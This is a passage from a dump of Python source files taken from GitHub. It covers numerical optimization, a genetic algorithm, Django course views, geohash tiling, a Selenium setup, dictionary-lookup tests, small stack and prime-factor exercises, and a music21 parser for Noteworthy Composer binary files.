\"SOLVER STATUS\")]\nfor x_guess in [[0, 0], [0.9, 0.9], [-0.9, -0.9]]:\n # Solve the NLP and get output\n sol = solver(x0 = x_guess)\n x_opt = sol['x'].full().flatten()\n summary.append((x_guess, x_opt, solver.stats()['return_status']))\n plt.plot([x_guess[0],x_opt[0]], [x_guess[1],x_opt[1]],'ro-')\n\nprint('SUMMARY:')\nfor (x0, x_opt, status) in summary:\n print(\"%20s , %20s , %20s\" % (x0, x_opt, status))\n if not(isinstance(x_opt, str)):\n # Check optimality\n print(\" Gradient: %20s\" % (F_grad(x_opt)))\n\n# Show plot\nplt.axis([-3,3,-3,3])\nplt.show()\n\n#%% 
===========================================================================\n# Solve Rosenbrock (constrained)\n# =============================================================================\nx = ca.MX.sym('x',3,1);\nf = x[0]**2 + 100*x[2]**2;\ng = x[2] + (1-x[0])**2 - x[1];\n\n# set i.c. and bounds\nw0 = [2.5,3.0,0.75] # initial guess array\nlbw = -np.inf # lower bound solution\nubw = np.inf # upper bound solution\nlbg = 0; # lower bound inequality array\nubg = 0; # upper bound inequality array\n\n# construct nlp\nnlp = {'x':x, 'f':f, 'g':g} # with constrains\nnlp = {'x':x, 'f':f} # without constrains\nsolver = ca.nlpsol('solver', 'ipopt', nlp);\nsol = solver(x0 = w0, lbx = lbw, ubx = ubw,lbg = lbg, ubg = ubg)\n\n# Solve the NLP and print solution\nprint(\"-----\")\nprint(\"> objective at solution = \", sol[\"f\"]) # > 0\nprint(\"> primal solution = \", sol[\"x\"]) # > [0, 1, 0]\nprint(\"> dual solution (x) = \", sol[\"lam_x\"]) # > [0, 0, 0]\nprint(\"> dual solution (g) = \", sol[\"lam_g\"]) # > 0","repo_name":"ltgio/process-optimization","sub_path":"tutorial_optimization.py","file_name":"tutorial_optimization.py","file_ext":"py","file_size_in_byte":5538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72907041194","text":"from random import randint\n\npopulation_size = 50\nancestor_count = 10\ngoal_string = \"Hello World!\"\npossible_chars = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ !\"\nmutation_chance_percentage = 5\n\n\n# Fitness function for given node in population\ndef evaluate(node):\n matching_chars = 0\n for i in range(len(node)):\n if node[i] == goal_string[i]:\n matching_chars += 1\n return matching_chars\n\n\n# Function to find matching string using GA\ndef find_match(pop, goal):\n iterations = 0\n\n # Loop until goal string is found\n while True:\n # Evaluate current population\n for cur_node in pop.keys():\n pop[cur_node] = evaluate(cur_node)\n\n # Check for match\n for cur_node, fitness in pop.items():\n if fitness == len(goal):\n return iterations\n\n # Get best ancestors to generate next population\n ancestors = sorted(pop.items(), key=lambda x: x[1], reverse=True)[:ancestor_count]\n print(ancestors[0])\n ancestors = dict(ancestors)\n\n # Decide whether or not to mutate\n to_remove = []\n to_add = []\n for cur_node, fitness in ancestors.items():\n mutate = randint(1, 100)\n if mutate <= mutation_chance_percentage:\n rand_char = possible_chars[randint(0, len(possible_chars) - 1)]\n rand_index = randint(0, len(cur_node) - 1)\n replace_string = list(cur_node)\n replace_string[rand_index] = rand_char\n to_remove.append(cur_node)\n to_add.append(\"\".join(replace_string))\n\n for node in to_remove:\n ancestors.pop(node)\n\n for node in to_add:\n ancestors[node] = -1\n\n # Cross-breed best ancestors\n pop = {}\n for cur_node in ancestors.keys():\n for breed_node in ancestors.keys():\n if not cur_node == breed_node:\n new_node = cur_node[:6] + breed_node[6:]\n pop[new_node] = -1\n\n iterations += 1\n\n\nif __name__ == '__main__':\n # Initialise population as an empty dict\n population = {}\n\n # Generate the population randomly from possible characters\n for i in range(population_size):\n string = \"\"\n\n for j in range(len(goal_string)):\n rand = randint(0, len(possible_chars) - 1)\n string += possible_chars[rand]\n\n population[string] = -1\n\n print(find_match(population, 
goal_string))\n","repo_name":"jackdneilson/CS547-Advanced-Topics-in-Software-Engineering","sub_path":"handin_1/Jack_Neilson/GeneticAlgorithm.py","file_name":"GeneticAlgorithm.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18622605600","text":"from django.shortcuts import render ,redirect ,reverse\r\nfrom django.http import HttpResponse ,JsonResponse\r\nfrom .models import *\r\nfrom django.core.paginator import PageNotAnInteger,Paginator,EmptyPage\r\nfrom operations.models import *\r\nfrom .forms import *\r\nfrom orgs.models import *\r\n\r\n\r\n\r\ndef CouresInfo(request):\r\n couresinfo = CourseInfo.objects.all()\r\n\r\n sort = request.GET.get('sort','')\r\n if sort:\r\n couresinfo = couresinfo.order_by('-'+sort)\r\n\r\n pagenum = request.GET.get('pagenum','')\r\n pa = Paginator(couresinfo,10)\r\n try:\r\n pages = pa.page(pagenum)\r\n except PageNotAnInteger:\r\n pages = pa.page(1)\r\n except EmptyPage:\r\n pages = pa.page(pa.num_pages)\r\n\r\n return render(request,'coures/coures.html',{\r\n 'couresinfo':couresinfo,\r\n 'pages':pages,\r\n 'sort':sort,\r\n })\r\n\r\n\r\ndef CouresDetail(request,couresid):\r\n if couresid:\r\n couresdetail = CourseInfo.objects.filter(id = couresid)[0]\r\n print(couresdetail)\r\n #点击量自动增加\r\n couresdetail.click_num += 1\r\n couresdetail.save()\r\n #获取收藏信息 如果用户存在 且收藏里有记录则改False 为 True 再把值返回给前端页面\r\n # lovecoures = False\r\n # loveorg = False\r\n # if request.user.is_authenticated():\r\n # love = UserLove.objects.filter(love_id=couresid, love_status=True, love_type=1, love_man=request.user)\r\n # if love:\r\n # lovecoures = True\r\n # loveorgs = UserLove.objects.filter(love_id=couresdetail.orginfo.id,love_status=True, love_type=2, love_man=request.user))\r\n # if loveorgs:\r\n # loveorg = True\r\n\r\n return render(request,'coures/couresdetail.html',{\r\n 'couresdetail':couresdetail,\r\n # 'lovecoures':lovecoures,\r\n # 'loveorg':loveorg,\r\n })\r\n\r\n\r\ndef CouresVideo(request,couresid):\r\n if couresid:\r\n couresinfo = CourseInfo.objects.filter(id=couresid)[0]\r\n #用户是否学习过该课程\r\n studyuser = UserCourse.objects.filter(study_man=request.user,study_course=couresinfo)\r\n #如果用户已学习过 直接返回 没有学习就保存数据\r\n if not studyuser:\r\n a = UserCourse()\r\n a.study_man = request.user\r\n a.study_course = couresinfo\r\n a.save()\r\n\r\n #学过课程的用户还学过什么\r\n coureslist = UserCourse.objects.filter(study_course=couresid)\r\n userlist = [ couresuser.study_man for couresuser in coureslist ]\r\n #排除当前所在课程的其它课程\r\n usercoureslist = UserCourse.objects.filter(study_man__in=userlist).exclude(study_course=couresid)\r\n usercoure = list(set([usercou.study_course for usercou in usercoureslist ]))\r\n #用set 集合去重\r\n print(usercoure)\r\n\r\n sort_coures = UserCourse.objects.order_by('-id')\r\n\r\n return render(request,'coures/couresvideo.html',{\r\n 'couresinfo':couresinfo,\r\n 'sort_coures':sort_coures,\r\n # 'lesson':lesson,\r\n })\r\n\r\ndef CouresComment(request):\r\n usercomment = UserCommentForm(request.POST)\r\n if usercomment.is_valid():\r\n coures = usercomment.cleaned_data['coures']\r\n content = usercomment.cleaned_data['content']\r\n\r\n a = UserComment()\r\n a.comment_course = coures\r\n a.comment_man = request.user\r\n a.comment_content = content\r\n a.save()\r\n return JsonResponse({\r\n 'status':'ok',\r\n 'msg':'ok'\r\n })\r\n else:\r\n return JsonResponse({\r\n 'status':'fail',\r\n 'msg':'error'\r\n 
})\r\n\r\n\r\n\r\n\r\n","repo_name":"vanllna/django","sub_path":"apps/courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16487512338","text":"import math\nfrom collections import namedtuple\n\nfrom . import geohash\n\nBox = namedtuple(\"Box\", [\"s\", \"w\", \"n\", \"e\"])\n\n\ndef geohash_bbox(gh):\n ret = geohash.bbox(gh)\n return Box(ret[\"s\"], ret[\"w\"], ret[\"n\"], ret[\"e\"])\n\n\ndef bbox(lat, lon, radius):\n lat_delta = radius * 360 / 40000\n lon_delta = lat_delta / math.cos(lat * math.pi / 180.0)\n return Box(lat - lat_delta, lon - lon_delta, lat + lat_delta, lon + lon_delta)\n\n\ndef overlap(a1, a2, b1, b2):\n return a1 < b2 and a2 > b1\n\n\ndef box_overlap(box1: Box, box2: Box):\n return overlap(box1.s, box1.n, box2.s, box2.n) and overlap(\n box1.w, box1.e, box2.w, box2.e\n )\n\n\ndef compute_geohash_tiles(lat, lon, radius, precision):\n bounds = bbox(lat, lon, radius)\n center = geohash.encode(lat, lon, precision)\n\n stack = set()\n checked = set()\n\n stack.add(center)\n checked.add(center)\n\n while stack:\n current = stack.pop()\n for neighbor in geohash.neighbors(current):\n if neighbor not in checked and box_overlap(geohash_bbox(neighbor), bounds):\n stack.add(neighbor)\n checked.add(neighbor)\n return checked\n\n\ndef geohash_overlap(lat, lon, radius, max_tiles=9):\n result = []\n for precision in range(1, 13):\n tiles = compute_geohash_tiles(lat, lon, radius, precision)\n if len(tiles) <= 9:\n result = tiles\n precision += 1\n else:\n break\n return result\n","repo_name":"BeardedTinker/Home-Assistant_Config","sub_path":"custom_components/blitzortung/geohash_utils.py","file_name":"geohash_utils.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":336,"dataset":"github-code","pt":"72"} +{"seq_id":"41230145696","text":"from dpath.util import merge\nfrom selenium import webdriver\nfrom selenium.webdriver.common.proxy import Proxy, ProxyType\nfrom .config import Config\nfrom .utils import maybe_bool, construct_dict\n\n\ndef initialize(driver_url):\n if len(Config.DESIRED_CAPABILITIES) == 0:\n options = webdriver.ChromeOptions()\n options.add_experimental_option('prefs', {'intl.accept_languages': 'ja_JP'})\n cap = options.to_capabilities()\n else:\n cap = {}\n for k, v in [cap.split(\"=\") for cap in Config.DESIRED_CAPABILITIES]:\n k = k.strip(\"\\\"'\")\n v = maybe_bool(v.strip(\"\\\"'\"))\n merge(cap, construct_dict(k, v))\n\n if Config.HTTP_PROXY or Config.HTTPS_PROXY or Config.NO_PROXY:\n proxy = Proxy()\n proxy.sslProxy = Config.HTTPS_PROXY\n proxy.httpProxy = Config.HTTP_PROXY\n proxy.noProxy = Config.NO_PROXY\n proxy.proxyType = ProxyType.MANUAL\n proxy.add_to_capabilities(cap)\n\n driver = webdriver.Remote(\n command_executor=driver_url,\n desired_capabilities=cap)\n\n return driver\n","repo_name":"side-runner-py/side-runner-py","sub_path":"side_runner_py/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"69896367914","text":"# blog/templatetags/blog_tags.py\n\n# Django modules\nfrom django import template\n\n# Locals\nfrom apps.blog.models import Post, Category, Tag \n\n# Template library\nregister = template.Library()\n\n# Register your template here.\n\n\n@register.inclusion_tag('blog/shared/aside_popular_posts.html')\ndef 
show_popular_posts(count=5):\n\tpopular_posts = Post.objects.filter(post_status='published', post_type='featured').order_by('-post_view')[:count]\n\t# print(popular_posts) # It works\n\tcontext = {'popular_posts':popular_posts}\n\treturn context\n\n\n@register.inclusion_tag('blog/shared/aside_category.html')\ndef show_posts_by_category():\n\tcategories = Category.objects.all()\n\t# print(categories) # It works\n\tcontext = {'categories':categories}\n\treturn context\n\n\n@register.inclusion_tag('blog/shared/aside_tags.html')\ndef show_tags():\n\ttags = Tag.objects.all()\n\tprint(tags) # It works\n\tcontext = {'tags':tags}\n\treturn context\n\n","repo_name":"gurnitha/2022-django4-blog-fantom","sub_path":"apps/blog/templatetags/template_tags_blog.py","file_name":"template_tags_blog.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12413249100","text":"import pytest\n\nfrom cardbuilder.common import Fieldname, Language\nfrom cardbuilder.exceptions import WordLookupException\nfrom cardbuilder.input.word import Word, WordForm\nfrom cardbuilder.lookup.data_source import DataSource\nfrom cardbuilder.lookup.ja_to_en import Jisho\nfrom tests.lookup.data_source_test import DataSourceTest\n\n\nclass TestJisho(DataSourceTest):\n\n def get_data_source(self) -> DataSource:\n return Jisho()\n\n def test_lookup(self):\n jisho = Jisho()\n inu_data = jisho.lookup_word(Word('犬', Language.JAPANESE), '��')\n\n assert(inu_data[Fieldname.PART_OF_SPEECH].get_data().lower() == 'noun')\n assert(inu_data[Fieldname.FOUND_FORM].get_data() == '犬')\n\n with pytest.raises(WordLookupException):\n jisho.lookup_word(Word('イヌ', Language.JAPANESE), 'イヌ')\n\n inu_katakana_data = jisho.lookup_word(Word('イヌ', Language.JAPANESE, [WordForm.PHONETICALLY_EQUIVALENT]), 'イヌ')\n assert(inu_katakana_data[Fieldname.PART_OF_SPEECH].get_data().lower() == 'noun')\n assert(inu_katakana_data[Fieldname.FOUND_FORM].get_data() == '犬')\n\n # exception check\n jisho.lookup_word(Word('デブ', Language.JAPANESE), 'デブ')\n\n def test_reading_gen(self):\n simple_reading = Jisho._detailed_reading('犬')\n complex_reading = Jisho._detailed_reading('水飲み場')\n\n assert(simple_reading == '犬[いぬ]')\n assert(complex_reading == '水[みず] 飲[の]み 場[ば]')\n\n\n\n\n\n\n","repo_name":"Mindful/cardbuilder","sub_path":"tests/lookup/ja_to_en/test_jisho.py","file_name":"test_jisho.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"32626021898","text":"#stck problem\n#bracket balancing: Check if the open bracket is closed\n\n# user_input = input(\"Type a bracket sequence.\")\n# from inspect import stck, stck\n\n\nuser_input = \"() (()[()])\"\nprint(user_input)\ndef check_the_input(input):\n stck = []\n for symbol in input:\n if symbol in \"\"\"\"[({'\"\"\":\n stck.append(symbol)\n else:\n if symbol in \"\"\"\"]})'\"\"\":\n stck.pop()\n\n else:\n continue\n\n if len(stck) == 0:\n print(\"Input is good\")\n\n else:\n print(\"You forgot to close the {0}\".format(stck[-1]))\n print(stck)\ncheck_the_input(user_input)\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nuser_input = input(\"Enter your string: \")\ndef check_input(input):\n stack = []\n for char in input:\n if char in \"\"\"({[\"'\"\"\":\n stack.append(char)\n elif char in \"\"\")}]\"'\"\"\":\n stack.pop()\n\n else:\n continue\n\n if len(stack) == 0:\n print(\"input is good\")\n\n else:\n print(\"You forgot to close the 
{}\".format(stack[-1]))\n\ncheck_input(user_input)","repo_name":"medeepeshyadav/Data-Structures-and-Algorithms","sub_path":"stacks/bracket_balancing.py","file_name":"bracket_balancing.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34360348283","text":"import math \ndef prime_factors(n): \n factors = []\n while n % 2 == 0: \n factors.append(2)\n n = n // 2\n for i in range(3,int(math.sqrt(n))+1,2): \n while n % i== 0: \n factors.append(i)\n n = n // i \n if n > 2: \n factors.append(n)\n return factors\n\n# Time Complexity: O(sqrt(N)), Space Complexity: O(N)\n# usage:\n# n = 100;\n# factors = prime_factors(n);\n# {2, 2, 5, 5}\n# 2*2*5*5 = 2^2 * 5^2 = 100","repo_name":"lmbaeza/Crypto","sub_path":"math/python/math_prime_factors.py","file_name":"math_prime_factors.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"464400729","text":"# -*- coding: utf-8 -*-\nimport mock\n\nfrom travel.avia.ticket_daemon.tests.partners.helper import (\n expected_variants, get_mocked_response,\n get_query, assert_variants_equal\n)\nfrom travel.avia.ticket_daemon.ticket_daemon.partners import aerotur\n\n\n@mock.patch('requests.post', return_value=get_mocked_response('uzairways3.xml'))\ndef test_aerotur_query(mocked_request):\n expected = expected_variants('uzairways3.json')\n test_query = get_query()\n variants = next(aerotur.query(test_query))\n\n assert_variants_equal(expected, variants)\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/partners/test_aerotur.py","file_name":"test_aerotur.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14197418406","text":"from __future__ import annotations\n\nimport pathlib\nimport struct\nimport typing as t\nfrom typing import TypedDict\n\nfrom music21 import environment\nfrom music21 import exceptions21\n\nfrom music21.noteworthy import constants\n\nenvironLocal = environment.Environment('noteworthy.translate')\n\n\nclass FontDict(TypedDict):\n name: bytes\n size: int\n style: int\n charset: int\n\n\nclass NoteworthyBinaryTranslateException(exceptions21.Music21Exception):\n pass\n\n\nclass NWCConverter:\n '''\n A converter object for binary .nwc files. 
+{"seq_id":"34360348283","text":"import math \ndef prime_factors(n): \n    factors = []\n    while n % 2 == 0: \n        factors.append(2)\n        n = n // 2\n    for i in range(3,int(math.sqrt(n))+1,2): \n        while n % i == 0: \n            factors.append(i)\n            n = n // i \n    if n > 2: \n        factors.append(n)\n    return factors\n\n# Time Complexity: O(sqrt(N)), Space Complexity: O(log N)\n# usage:\n# n = 100\n# factors = prime_factors(n)\n# [2, 2, 5, 5]\n# 2*2*5*5 = 2^2 * 5^2 = 100","repo_name":"lmbaeza/Crypto","sub_path":"math/python/math_prime_factors.py","file_name":"math_prime_factors.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"464400729","text":"# -*- coding: utf-8 -*-\nimport mock\n\nfrom travel.avia.ticket_daemon.tests.partners.helper import (\n    expected_variants, get_mocked_response,\n    get_query, assert_variants_equal\n)\nfrom travel.avia.ticket_daemon.ticket_daemon.partners import aerotur\n\n\n@mock.patch('requests.post', return_value=get_mocked_response('uzairways3.xml'))\ndef test_aerotur_query(mocked_request):\n    expected = expected_variants('uzairways3.json')\n    test_query = get_query()\n    variants = next(aerotur.query(test_query))\n\n    assert_variants_equal(expected, variants)\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/partners/test_aerotur.py","file_name":"test_aerotur.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"14197418406","text":"from __future__ import annotations\n\nimport pathlib\nimport struct\nimport typing as t\nfrom typing import TypedDict\n\nfrom music21 import environment\nfrom music21 import exceptions21\n\nfrom music21.noteworthy import constants\n\nenvironLocal = environment.Environment('noteworthy.translate')\n\n\nclass FontDict(TypedDict):\n    name: bytes\n    size: int\n    style: int\n    charset: int\n\n\nclass NoteworthyBinaryTranslateException(exceptions21.Music21Exception):\n    pass\n\n\nclass NWCConverter:\n    '''\n    A converter object for binary .nwc files. Do not normally use directly; use converter.parse.\n\n    >>> nwcc = noteworthy.binaryTranslate.NWCConverter()\n    >>> nwcc\n    <music21.noteworthy.binaryTranslate.NWCConverter object at 0x...>\n    >>> nwcc.fileContents\n    b''\n    >>> nwcc.parsePosition\n    0\n    >>> nwcc.version # version of nwc file to be parsed\n    200\n    >>> nwcc.numberOfStaves\n    0\n    >>> nwcc.staves\n    []\n    '''\n    def __init__(self, **keywords) -> None:\n        self.fileContents: bytes = b''\n        self.parsePosition = 0\n        self.version = 200\n        self.numberOfStaves = 0\n        self.titlePageInfo = 0\n        self.pageNumberStart = 0\n        self.staves: list[NWCStaff] = []\n        self.comment: bytes = b''\n        self.fonts: list[FontDict] = []\n        self.lyricist: bytes = b''\n        self.groupVisibility: bytes = b''\n        self.allowLayering: int = 1\n        self.margins: bytes = b''\n        self.notationTypeface: bytes = b'Maestro'\n        self.extendLastSystem = None\n        self.copyright1: bytes = b''\n        self.copyright2: bytes = b''\n        self.increaseNoteSpacing = None\n        self.author: bytes = b''\n        self.title: bytes = b''\n        self.measureStart = None\n        self.measureNumbers = None\n        self.mirrorMargins = None\n        self.staffLabels = None\n        self.sins = None\n        self.user: bytes = b''\n        self.staffHeight = 0\n        self.currentAlterations: dict[int, str] = {}\n\n    # noinspection SpellCheckingInspection\n    def parseFile(self, fp: pathlib.Path | str):\n        # noinspection PyShadowingNames\n        r'''\n        Parse a file (calls .toStream)\n\n        >>> #_DOCS_SHOW fp = '/Users/cuthbert/desktop/cuthbert_test1.nwc'\n        >>> fp = str(common.getSourceFilePath()/'noteworthy'/'cuthbert_test1.nwc') #_DOCS_HIDE\n        >>> nwcc = noteworthy.binaryTranslate.NWCConverter()\n        >>> nwcc.fileContents\n        b''\n        >>> streamObj = nwcc.parseFile(fp)\n        >>> len(nwcc.fileContents) # binary\n        1139\n        >>> nwcc.fileContents[0:80]\n        b'[NoteWorthy ArtWare]\\x00\\x00\\x00[NoteWorthy\n        Composer]\\x00\\x01\\x02\\x02\\x00\\x00\\x00N/A\\x000_JldRQMSKq6M5a3FQqK_g\\x00\\x00\\x00'\n        >>> streamObj\n        <music21.stream.Score 0x...>\n        '''\n        with open(fp, 'rb') as f:\n            self.fileContents = f.read()\n        self.parse()\n        return self.toStream()\n\n    def parseString(self, bytesIn: bytes = b''):\n        '''\n        same as parseFile but takes a string (in Py3, bytes) of binary data instead.\n        '''\n        self.fileContents = bytesIn\n        self.parse()\n        return self.toStream()\n\n    def readLEShort(self, updateParsePosition=True):\n        '''\n        Helper module: read a little-endian short value to an integer\n\n        >>> nwcc = noteworthy.binaryTranslate.NWCConverter()\n        >>> nwcc.fileContents = b'\\x02\\x01\\x03\\x01'\n        >>> nwcc.parsePosition\n        0\n        >>> nwcc.readLEShort()\n        258\n        >>> nwcc.parsePosition\n        2\n        >>> nwcc.readLEShort()\n        259\n        >>> nwcc.parsePosition\n        4\n\n        Or to not update the parsePosition, send False:\n        >>> nwcc.parsePosition = 0\n        >>> nwcc.readLEShort(False)\n        258\n        >>> nwcc.readLEShort(False)\n        258\n        >>> nwcc.parsePosition\n        0\n        '''\n        fc = self.fileContents\n        pp = self.parsePosition\n        value = struct.unpack('<h', fc[pp:pp + 2])[0]\n        if updateParsePosition is True:\n            self.parsePosition = pp + 2\n        return value\n\n    def byteToInt(self, updateParsePosition=True):\n        '''\n        changes a byte into an unsigned int\n        (i.e., if the byte is > 127 then it's subtracted from 256)\n        '''\n        fc = self.fileContents\n        pp = self.parsePosition\n        value = ord(fc[pp:pp + 1])\n        # print(value)\n        if updateParsePosition is True:\n            self.parsePosition = pp + 1\n        return value\n\n    def byteToSignedInt(self, updateParsePosition=True):\n        '''\n        changes a byte into a signed int\n        (i.e., if the byte is > 127 then it's subtracted from 256)\n        '''\n        val = self.byteToInt(updateParsePosition)\n        if val > 127:\n            val = val - 256\n        return val
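\n\n    # A doctest-style sanity check of the helpers above (illustrative only;\n    # '<h' is struct's little-endian signed 16-bit format, so the byte pair\n    # 0x02 0x01 reads back as 0x0102 == 258):\n    #\n    #   >>> import struct\n    #   >>> struct.unpack('<h', b'\\x02\\x01')[0]\n    #   258\n    #   >>> val = 255                          # a raw byte over 127...\n    #   >>> val - 256 if val > 127 else val    # ...maps to a negative signed value\n    #   -1\n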
\n    def readBytes(self, bytesToRead=1, updateParsePosition=True) -> bytes:\n        '''\n        reads the next bytesToRead bytes and then (optionally) updates self.parsePosition\n        '''\n        fc = self.fileContents\n        pp = self.parsePosition\n        value = fc[pp:pp + bytesToRead]\n        if updateParsePosition is True:\n            self.parsePosition = pp + bytesToRead\n        return value\n\n    def readToNUL(self, updateParsePosition=True) -> bytes:\n        r'''\n        reads self.fileContents up to, but not including, the next position of \\x00.\n\n        updates the parsePosition unless updateParsePosition is False\n        '''\n        fc = self.fileContents\n        try:\n            nulPosition = fc.index(0, self.parsePosition)\n        except ValueError:\n            nulPosition = -1\n            # raise NoteworthyBinaryTranslateException(fc[self.parsePosition:],\n            #    self.parsePosition)\n        # print(self.parsePosition, nulPosition)\n        ret: bytes\n        if nulPosition == -1:\n            ret = fc[self.parsePosition:]\n        else:\n            ret = fc[self.parsePosition:nulPosition]\n        if updateParsePosition is True:\n            self.parsePosition = nulPosition + 1\n        return ret\n\n    def isValidNWCFile(self, updateParsePosition=True) -> bool:\n        storedPP = self.parsePosition\n        self.parsePosition = 0\n        header1 = self.readToNUL()\n        if header1 != b'[NoteWorthy ArtWare]':\n            return False\n        junk = self.readToNUL()\n        junk = self.readToNUL()\n        header2 = self.readToNUL()\n        if header2 != b'[NoteWorthy Composer]':\n            return False\n        if updateParsePosition is False and storedPP != 0:\n            self.parsePosition = storedPP\n        return True\n\n    # thanks to Juria90 for figuring these out! and so much more!\n    versionFromHex = {0x0114: 120,\n                      0x011E: 130,\n                      0x0132: 150,\n                      0x0137: 155,\n                      0x0146: 170,\n                      0x014B: 175,\n                      0x0200: 200,\n                      0x0201: 201,\n                      }\n\n    def fileVersion(self, updateParsePosition=True):\n        storedPP = self.parsePosition\n        self.parsePosition = 45\n        fileVersionRaw = self.readLEShort(updateParsePosition)\n        if updateParsePosition is False:\n            self.parsePosition = storedPP\n        if fileVersionRaw in self.versionFromHex:\n            self.version = self.versionFromHex[fileVersionRaw]\n        else:\n            print('No Version Found! Most likely a newer version. Using 2.01')\n            self.version = 201  # most likely a newer version\n\n        return self.version\n\n    def skipBytes(self, numBytes=1):\n        self.parsePosition += numBytes\n\n    def advanceToNotNUL(self, nul: bytes = b'\\x00'):\n        pp = self.parsePosition\n        fc = self.fileContents\n        # the slice Notation [pp:pp + 1] is needed to avoid Py3 conversion to bytes\n        while fc[pp:pp + 1] == nul:\n            pp += 1\n        self.parsePosition = pp\n\n    def parse(self):\n        '''\n        the main parse routine called by parseFile() or parseString()\n        '''\n        if self.fileContents[0:6] == b'[NWZ]\\x00':\n            import zlib\n            fcNew = zlib.decompress(self.fileContents[6:])\n            self.fileContents = fcNew\n\n        self.parsePosition = 0\n        self.parseHeader()\n        self.staves = []\n        # print(self.numberOfStaves)\n\n        for i in range(self.numberOfStaves):\n            thisStaff = NWCStaff(parent=self)\n            thisStaff.parse()\n            self.staves.append(thisStaff)\n\n    def parseHeader(self) -> None:\n        '''\n        Sets a ton of information from the header, and advances the parse position.\n        '''\n        self.isValidNWCFile()\n        self.fileVersion()\n\n        # print(self.version)\n        # print(self.parsePosition)\n        self.skipBytes(4) # skipping registered vs. 
unregistered\n # print(self.parsePosition)\n self.user = self.readToNUL()\n # print(self.user)\n unused_unknown = self.readToNUL()\n # print(unused_unknown)\n self.skipBytes(10)\n self.title = self.readToNUL()\n self.author = self.readToNUL()\n if self.version >= 200:\n self.lyricist = self.readToNUL()\n self.copyright1 = self.readToNUL()\n self.copyright2 = self.readToNUL()\n self.comment = self.readToNUL()\n\n self.extendLastSystem = self.byteToInt()\n self.increaseNoteSpacing = self.byteToInt()\n unused = self.readBytes(5)\n self.measureNumbers = self.byteToInt()\n\n unused = self.readBytes(1)\n self.measureStart = self.readLEShort()\n if self.version >= 130:\n self.margins = self.readToNUL()\n else:\n self.margins = b'0.0 0.0 0.0 0.0'\n\n unused = self.byteToInt()\n unused = self.readBytes(2)\n if self.version >= 130:\n self.groupVisibility = self.readBytes(32)\n self.allowLayering = self.byteToInt()\n\n if self.version >= 200:\n self.notationTypeface = self.readToNUL()\n self.staffHeight = self.readLEShort()\n\n if self.version > 170:\n fontCount = 12\n elif self.version > 130:\n fontCount = 10 # some 170 have 12 font info. See Juria90's code for workaround.\n else:\n fontCount = 0\n self.advanceToNotNUL() # should not be needed, but some parse errors\n self.skipBytes(2)\n self.fonts = []\n for i in range(fontCount):\n fontDict: FontDict = {\n 'name': self.readToNUL(),\n 'style': self.byteToInt(), # regular; 1 = bold; 2 = italic; 3 = bold italic???\n 'size': self.byteToInt(),\n 'charset': 0,\n }\n unused = self.byteToInt()\n fontDict['charset'] = self.byteToInt()\n if fontDict['name'] == b'':\n fontDict['name'] = b'Times New Roman'\n if fontDict['size'] == 0:\n fontDict['size'] = 12\n self.fonts.append(fontDict)\n # ansi charset is default; but we don't use\n # print(self.fonts)\n self.titlePageInfo = self.byteToInt()\n\n # index of [None, First Systems, Top Systems, All Systems]\n self.staffLabels = self.byteToInt()\n self.pageNumberStart = self.readLEShort()\n if self.version >= 200:\n self.skipBytes(1)\n self.numberOfStaves = self.byteToInt()\n # print('StaffCount', self.numberOfStaves)\n self.skipBytes(1)\n\n def dumpToNWCText(self) -> list[str]:\n infos = ''\n if self.title:\n infos += '|SongInfo|Title:' + self.title.decode('latin_1')\n if self.author:\n infos += '|Author:' + self.author.decode('latin_1')\n dumpObjects = [infos]\n for s in self.staves:\n staffDumpObjects = s.dump()\n for sdo in staffDumpObjects:\n dumpObjects.append(sdo)\n\n return dumpObjects\n\n def toStream(self):\n from music21.noteworthy import translate\n nwt = translate.NoteworthyTranslator()\n s = nwt.parseList(self.dumpToNWCText())\n return s\n\n\nclass NWCStaff:\n '''\n A NWCStaff is a list of NWCObjects (see :meth:`parseObjects`) associated to metadata\n (see :meth:`parseHeader`). 
